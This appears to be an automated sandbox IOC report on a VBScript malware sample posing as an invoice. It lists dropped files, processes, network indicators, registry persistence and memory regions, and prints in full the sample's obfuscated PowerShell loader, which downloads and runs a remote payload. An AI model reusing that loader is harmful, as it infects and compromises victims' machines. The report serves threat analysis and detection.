IOC Report
Factura2.vbs

loading gif

Files

File Path
Type
Category
Malicious
Factura2.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4jeyehg.lfb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gg0c4grn.x0c.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxhyeiht.4sr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r1qfwglr.siy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Merogastrula.Bes
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Roaming\newfile\newfile.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivaelogfirGa,lesTaga,[.etox$SlentNEct suGenfraAph onRelincKroniemorthrPrecieLandstBjrne]Neohi=Can e$MelloHFolkeoMeddevSaleaeSjalsdA.allvS awnrOutbukVexateAseptr.toma ');$Smoky=Pisseskn ' SubsBAud oaU,tegaLnt,ld otharBegynuKlanttB.azaeQuintnBinde. Ha dD,ejevoLumbaw,eksin Fe ilplejeo.orniaDecimdtragiFfortriHeadllThermeMeta (Under$Opsl,uCordanHummis,racuhpseu,aUdslidIongiy,ogtr,Chair$,aadvSGrievt Sn.ea,ensirPhytot ,undh AtomuR,evelPyra.l MoraeMorphrSuffr)Humif ';$Smoky=$Asseverating[1]+$Smoky;$Starthuller=$Asseverating[0];Saprophagan (Pisseskn ' Indi$ Nonmg aflalNoninoFlashb nfaaE.dotlTro,d:Inte.s Datap IndorLogicoVandbg infifStudioHarqurKendisA amok,olysePavelrDaasenskepte,nnivs odse= apni(NumerTDebone FinnsOt ertConci-H,emgPGinetaStedstAffalh .run ritar$UnmanSreva.tBrohoaOverfr,hospt Pe.ahPatroutilgalUdl,sl PeneeHairerTrste) Netv ');while (!$sprogforskernes) {Saprophagan (Pisseskn ',ivaa$RegurgFolk,l sonioSprigbElastaBrotolvalla:StaphSBr,ehu.eulob,ireetmotoro anct Br.vaKurmalRe.frlIngvai bag n CogigUnd r=Skram$TeksttR,alirPlatouSil ne Hnde ') ;Saprophagan $Smoky;Saprophagan (Pisseskn 'HubbaSResultTr quaMorskrAppaytAbrup-Pra,sS.jeldlFeasieElleveKoghepRund, Ungdo4P.irr ');Saprophagan (Pisseskn 'Super$Suggeg Ungel Pr fo psitbVandraInterlPol,f:Randss KajupflerbrSaldeoMycelgslingfRaakooG,ardr I,ess Tullkv ktoePat,orS ertnCytoleHypoasMilko= Forb(CraneTKe soeToluqsFrstetYet p-dek aPbortsaModsttDyvouhUnbu. Whats$ Hu kS ArchtGyar aZiontrActintsemmih urblu.omprl Bry.lTuyereHavburAlwin)Byste ') ;Saprophagan (Pisseskn 'Unobe$DinargRaglalTriceoJunc,b Rutiajustil Gnat: SyndZ ov roBushbcPropiaBon ml PartoBagfl=Nonp $Id.algBly alWeedeoDimitb Pre,aSporrlcos.a:DecimKJsandoBorgerChemot For l AfrigPisannLifoiiP skenMus.tg DiskePanterPo,yd+Con.u+Legi.%Behng$ CacoF hamad Sworr Fal,eSvumnn Bh.leGratuhBoligjV.inyewic,omBrand.,etincAsymmo .estu Pa lnExtentpropa ') ;$unshady=$Fdrenehjem[$Zocalo];}Saprophagan (Pisseskn 'Bolig$KjesegProevlGa,blo B.rdbPauseaStudilKenni:BramsLRegule adedn Clare.edrat Kugl Nymaa=Su.pr In,oGSpecteMela,t Ammi-AnskaCacumeoKrigsnJingstPref,ePyobanKonfetExha, Tids$ GaviSBl wttAkadea BranrKolpotBillehsk teu Per,l UntulAl,oceWa err dgif ');Saprophagan (Pisseskn 'Syr.b$sideogPondwlAposeoP,rspbUnex aSiro,lBacil:EbraiURea.tn Coa,iHelseogebyrn CirciP.seksBlasetReereeOrdner RejssAt ac Slags=Repat Borge[hoptoS Wroky rgumsParentGavekeMo.abmFlje..Pr.acC PerioremsenSurf.v BereeUgr,irBlaartPreop]Imbo : Sidd:UnemoFF,scir bil oParacmUns.oBBa,veaSchepsPalmaeAccul6Nejsi4HabilS ,teatPa ser.ntibiAn.lenScantgTutti(Lejeo$afskiLPseudeUnstanForsve roostEngsn)Elekt ');Saprophagan (Pisseskn 'Und.k$re.segtyreslH ratome iabKondeaU brilBumme:Jvn.rSGavebc S.tao amicffiordf Sings judg Ikra=Fan,a Ko po[OutrhS Nondy Posts OccitvinedeReloamHul.i.Fl,niTAquate,arnexAfprvtCafe..Gge.uESkibinA,armcD moroInropdDecori DrninSlinggHniss] Unus: marg:SoignAKrligSF.rsiCs.nspIProduIo.ymp.BrislGB,rgoeEl.stt intrSGar,etCypr.rInactiGen,anStdergForma(Immun$Oed,pUSkinbn,ptagiCohaboDemianTalleichorisAn ist SliceSkomar Pa,tsRe.im) Xant ');Saprophagan (Pisseskn 'Alter$Bacchg Hdrel SpecoAntirb CowpaGimmilLeuco:talleSfejlmuBrandp.ooeyePro orT leviKei.un bebocp ykiuSubcomFortibStikoeUly,knJapactIndre1 Muni6Bryg,3Lejek=Retss$,hiroSu.wagcRefleo EndofO,ercfLootisTeate.IndlusPa tauKredibVaca sFr igtfrkherTweeziAuditn RiflgRetal( He m3 Sy,t1Spik.5 Poly0flout7Cho.d3Nephr,Lidel2uncom7 Ko.p4Proje3Lycop0se.eh)spout ');Saprophagan $Superincumbent163;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivaelogfirGa,lesTaga,[.etox$SlentNEct suGenfraAph onRelincKroniemorthrPrecieLandstBjrne]Neohi=Can e$MelloHFolkeoMeddevSaleaeSjalsdA.allvS awnrOutbukVexateAseptr.toma ');$Smoky=Pisseskn ' SubsBAud oaU,tegaLnt,ld otharBegynuKlanttB.azaeQuintnBinde. Ha dD,ejevoLumbaw,eksin Fe ilplejeo.orniaDecimdtragiFfortriHeadllThermeMeta (Under$Opsl,uCordanHummis,racuhpseu,aUdslidIongiy,ogtr,Chair$,aadvSGrievt Sn.ea,ensirPhytot ,undh AtomuR,evelPyra.l MoraeMorphrSuffr)Humif ';$Smoky=$Asseverating[1]+$Smoky;$Starthuller=$Asseverating[0];Saprophagan (Pisseskn ' Indi$ Nonmg aflalNoninoFlashb nfaaE.dotlTro,d:Inte.s Datap IndorLogicoVandbg infifStudioHarqurKendisA amok,olysePavelrDaasenskepte,nnivs odse= apni(NumerTDebone FinnsOt ertConci-H,emgPGinetaStedstAffalh .run ritar$UnmanSreva.tBrohoaOverfr,hospt Pe.ahPatroutilgalUdl,sl PeneeHairerTrste) Netv ');while (!$sprogforskernes) {Saprophagan (Pisseskn ',ivaa$RegurgFolk,l sonioSprigbElastaBrotolvalla:StaphSBr,ehu.eulob,ireetmotoro anct Br.vaKurmalRe.frlIngvai bag n CogigUnd r=Skram$TeksttR,alirPlatouSil ne Hnde ') ;Saprophagan $Smoky;Saprophagan (Pisseskn 'HubbaSResultTr quaMorskrAppaytAbrup-Pra,sS.jeldlFeasieElleveKoghepRund, Ungdo4P.irr ');Saprophagan (Pisseskn 'Super$Suggeg Ungel Pr fo psitbVandraInterlPol,f:Randss KajupflerbrSaldeoMycelgslingfRaakooG,ardr I,ess Tullkv ktoePat,orS ertnCytoleHypoasMilko= Forb(CraneTKe soeToluqsFrstetYet p-dek aPbortsaModsttDyvouhUnbu. Whats$ Hu kS ArchtGyar aZiontrActintsemmih urblu.omprl Bry.lTuyereHavburAlwin)Byste ') ;Saprophagan (Pisseskn 'Unobe$DinargRaglalTriceoJunc,b Rutiajustil Gnat: SyndZ ov roBushbcPropiaBon ml PartoBagfl=Nonp $Id.algBly alWeedeoDimitb Pre,aSporrlcos.a:DecimKJsandoBorgerChemot For l AfrigPisannLifoiiP skenMus.tg DiskePanterPo,yd+Con.u+Legi.%Behng$ CacoF hamad Sworr Fal,eSvumnn Bh.leGratuhBoligjV.inyewic,omBrand.,etincAsymmo .estu Pa lnExtentpropa ') ;$unshady=$Fdrenehjem[$Zocalo];}Saprophagan (Pisseskn 'Bolig$KjesegProevlGa,blo B.rdbPauseaStudilKenni:BramsLRegule adedn Clare.edrat Kugl Nymaa=Su.pr In,oGSpecteMela,t Ammi-AnskaCacumeoKrigsnJingstPref,ePyobanKonfetExha, Tids$ GaviSBl wttAkadea BranrKolpotBillehsk teu Per,l UntulAl,oceWa err dgif ');Saprophagan (Pisseskn 'Syr.b$sideogPondwlAposeoP,rspbUnex aSiro,lBacil:EbraiURea.tn Coa,iHelseogebyrn CirciP.seksBlasetReereeOrdner RejssAt ac Slags=Repat Borge[hoptoS Wroky rgumsParentGavekeMo.abmFlje..Pr.acC PerioremsenSurf.v BereeUgr,irBlaartPreop]Imbo : Sidd:UnemoFF,scir bil oParacmUns.oBBa,veaSchepsPalmaeAccul6Nejsi4HabilS ,teatPa ser.ntibiAn.lenScantgTutti(Lejeo$afskiLPseudeUnstanForsve roostEngsn)Elekt ');Saprophagan (Pisseskn 'Und.k$re.segtyreslH ratome iabKondeaU brilBumme:Jvn.rSGavebc S.tao amicffiordf Sings judg Ikra=Fan,a Ko po[OutrhS Nondy Posts OccitvinedeReloamHul.i.Fl,niTAquate,arnexAfprvtCafe..Gge.uESkibinA,armcD moroInropdDecori DrninSlinggHniss] Unus: marg:SoignAKrligSF.rsiCs.nspIProduIo.ymp.BrislGB,rgoeEl.stt intrSGar,etCypr.rInactiGen,anStdergForma(Immun$Oed,pUSkinbn,ptagiCohaboDemianTalleichorisAn ist SliceSkomar Pa,tsRe.im) Xant ');Saprophagan (Pisseskn 'Alter$Bacchg Hdrel SpecoAntirb CowpaGimmilLeuco:talleSfejlmuBrandp.ooeyePro orT leviKei.un bebocp ykiuSubcomFortibStikoeUly,knJapactIndre1 Muni6Bryg,3Lejek=Retss$,hiroSu.wagcRefleo EndofO,ercfLootisTeate.IndlusPa tauKredibVaca sFr igtfrkherTweeziAuditn RiflgRetal( He m3 Sy,t1Spik.5 Poly0flout7Cho.d3Nephr,Lidel2uncom7 Ko.p4Proje3Lycop0se.eh)spout ');Saprophagan $Superincumbent163;"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Users\user\AppData\Roaming\newfile\newfile.exe
"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
malicious
C:\Users\user\AppData\Roaming\newfile\newfile.exe
"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://www.google.com
unknown
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
https://aka.ms/pscore6lB
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.google.com
unknown
https://drive.usercontent.googh
unknown
https://drive.usercontent.google.com
unknown
https://drive.googPb
unknown
http://drive.google.com
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 12 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
mail.cash4cars.nz
114.142.162.17
drive.google.com
64.233.185.138
drive.usercontent.google.com
74.125.138.132
ip-api.com
208.95.112.1

IPs

IP
Domain
Country
Malicious
208.95.112.1
ip-api.com
United States
114.142.162.17
mail.cash4cars.nz
Australia
74.125.138.132
drive.usercontent.google.com
United States
64.233.185.138
drive.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
newfile
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
There are 25 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
62C1000
trusted library allocation
page read and write
malicious
24551000
trusted library allocation
page read and write
malicious
245A1000
trusted library allocation
page read and write
malicious
243B8200000
trusted library allocation
page read and write
malicious
CA31000
direct allocation
page execute and read and write
malicious
7441000
remote allocation
page execute and read and write
malicious
8EA0000
direct allocation
page execute and read and write
malicious
C031000
direct allocation
page execute and read and write
5C4B6FF000
stack
page read and write
1EA79089000
heap
page read and write
7FFD34952000
trusted library allocation
page read and write
336E000
stack
page read and write
243A89F8000
trusted library allocation
page read and write
1EA79079000
heap
page read and write
1EA7908E000
heap
page read and write
88A0000
trusted library allocation
page read and write
1EA792CF000
heap
page read and write
243A9F64000
trusted library allocation
page read and write
2FDC000
stack
page read and write
9BD85FB000
stack
page read and write
1EA791DB000
heap
page read and write
1EA792AD000
heap
page read and write
243C0A00000
heap
page read and write
1EA79411000
heap
page read and write
26B8F000
trusted library allocation
page read and write
243A80A6000
heap
page read and write
1EA790A1000
heap
page read and write
4D10000
heap
page read and write
A231000
direct allocation
page execute and read and write
26B60000
trusted library allocation
page read and write
8C7E000
stack
page read and write
27530000
trusted library allocation
page execute and read and write
1EA7919A000
heap
page read and write
9BD7FFE000
stack
page read and write
1FEC6480000
heap
page read and write
8BB0000
direct allocation
page read and write
8960000
heap
page read and write
3434000
heap
page read and write
1EA79419000
heap
page read and write
243B819F000
trusted library allocation
page read and write
243A6860000
trusted library allocation
page read and write
4E5E000
stack
page read and write
7DF0000
trusted library allocation
page read and write
243A9F97000
trusted library allocation
page read and write
1EA7922D000
heap
page read and write
1EA7946E000
heap
page read and write
1EA79611000
heap
page read and write
26B70000
trusted library allocation
page read and write
6A41000
remote allocation
page execute and read and write
740F000
stack
page read and write
26BB0000
trusted library allocation
page read and write
8980000
trusted library allocation
page read and write
26B60000
trusted library allocation
page read and write
33B2000
heap
page read and write
243A7FCC000
heap
page read and write
1EA79433000
heap
page read and write
4DF0000
trusted library allocation
page read and write
1EA77435000
heap
page read and write
3190000
heap
page read and write
1EA791E0000
heap
page read and write
4C41000
remote allocation
page execute and read and write
243C072E000
heap
page read and write
8BE0000
direct allocation
page read and write
1EA77380000
remote allocation
page read and write
1EA792C8000
heap
page read and write
243C07BC000
heap
page read and write
26660000
trusted library allocation
page read and write
555B000
stack
page read and write
243A7F40000
heap
page execute and read and write
3355000
heap
page read and write
7445000
heap
page execute and read and write
8A17000
heap
page read and write
25549000
trusted library allocation
page read and write
8CE0000
heap
page read and write
1EA79156000
heap
page read and write
26B90000
trusted library allocation
page read and write
26B80000
trusted library allocation
page read and write
243A9F41000
trusted library allocation
page read and write
28CF000
unkown
page read and write
8C2E000
stack
page read and write
323B000
stack
page read and write
26B80000
trusted library allocation
page read and write
1EA790BB000
heap
page read and write
24230000
direct allocation
page read and write
26B60000
trusted library allocation
page read and write
D431000
direct allocation
page execute and read and write
8A70000
direct allocation
page read and write
73CE000
stack
page read and write
26B70000
trusted library allocation
page read and write
26B50000
trusted library allocation
page read and write
1EA791A2000
heap
page read and write
1EA791D1000
heap
page read and write
26B80000
trusted library allocation
page read and write
244F0000
heap
page read and write
1EA791CD000
heap
page read and write
243C0196000
heap
page read and write
4DC0000
trusted library allocation
page read and write
1EA7919A000
heap
page read and write
5020000
heap
page read and write
245B0000
trusted library allocation
page read and write
75C0000
direct allocation
page read and write
1EA79010000
heap
page read and write
1EA79046000
heap
page read and write
5641000
remote allocation
page execute and read and write
1EA790AA000
heap
page read and write
8B6B000
stack
page read and write
26ABE000
stack
page read and write
1EA79033000
heap
page read and write
7FFD3477D000
trusted library allocation
page execute and read and write
27520000
trusted library allocation
page read and write
3292000
heap
page read and write
1EA7903B000
heap
page read and write
4EA0000
heap
page readonly
24591000
trusted library allocation
page read and write
7FFD3482C000
trusted library allocation
page execute and read and write
35D8000
heap
page read and write
7FFD34AC0000
trusted library allocation
page read and write
26B90000
trusted library allocation
page read and write
4DC4000
trusted library allocation
page read and write
A42000
trusted library allocation
page read and write
26B80000
trusted library allocation
page read and write
7FFD34A10000
trusted library allocation
page read and write
1EA791D1000
heap
page read and write
4EE0000
heap
page read and write
1EA7901F000
heap
page read and write
1EA79033000
heap
page read and write
1EA792A8000
heap
page read and write
4E9F000
stack
page read and write
2ACF000
stack
page read and write
8BEC000
stack
page read and write
243A64E0000
